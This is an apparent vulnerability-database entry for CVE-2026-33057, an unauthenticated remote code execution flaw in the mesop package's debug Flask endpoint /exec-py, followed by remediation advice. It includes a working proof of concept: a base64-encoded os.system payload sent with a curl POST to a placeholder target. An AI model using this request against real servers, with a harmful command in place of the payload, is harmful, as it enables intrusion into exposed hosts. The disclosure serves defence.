CVE-2026-33057
CRITICALCVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3Description
#### Summary An explicit web endpoint inside the `ai/` testing module infrastructure directly ingests untrusted Python code strings unconditionally without authentication measures, yielding standard Unrestricted Remote Code Execution. Any individual capable of routing HTTP logic to this server block will gain explicit host-machine command rights. #### Details The AI codebase package includes a lightweight debugging Flask server inside `ai/sandbox/wsgi_app.py`. The `/exec-py` route accepts base_64 encoded raw string payloads inside the `code` parameter natively evaluated by a basic `POST` web request. It saves it rapidly to the operating system logic path and injects it recursively using `execute_module(module_path...)`. ```python # ai/sandbox/wsgi_app.py @flask_app.route("/exec-py", methods=["POST"]) def exec_py_route(): code = base64.urlsafe_b64decode(request.form.get("code")) # ... code is blindly written to file and forcefully executed ``` #### PoC ```bash # Payload: # import os # os.system('echo "pwned by attacker" > /tmp/pwned.txt') # # Base64 string represents the identical payload block above: # aW1wb3J0IG9zCm9zLnN5c3RlbSgnZWNobyAicHduZWQgYnkgYXR0YWNrZXIiID4gL3RtcC9wd25lZC50eHQnKQ== curl -X POST http://<target_ip_address_hosting_sandbox>:port/exec-py \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "code=aW1wb3J0IG9zCm9zLnN5c3RlbSgnZWNobyAicHduZWQgYnkgYXR0YWNrZXIiID4gL3RtcC9wd25lZC50eHQnKQ==" # Validate exploitation target execution natively: # $ cat /tmp/pwned.txt # pwned by attacker ``` #### Impact This presents trivial severity for systems publicly exposed or lacking strictly verified boundary firewalls due to absolute unauthenticated command injection privileges targeting the direct execution interpreter running this service sandbox.
Analysis
An unauthenticated remote code execution vulnerability exists in the mesop Python package's debugging Flask server endpoint (/exec-py) that accepts and executes arbitrary base64-encoded Python code without any authentication or validation. The vulnerability affects the mesop pip package, with a publicly disclosed proof-of-concept demonstrating trivial exploitation requiring only a single HTTP POST request. …
Sign in for full analysis, threat intelligence, and remediation guidance.
Remediation
Within 24 hours: Identify all systems running mesop and determine if the /exec-py endpoint is accessible from untrusted networks; immediately restrict network access if exposed. Within 7 days: Remove mesop from production environments or disable the debugging Flask server entirely; evaluate alternative solutions. …
Sign in for detailed remediation steps.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-gjgx-rvqr-6w6v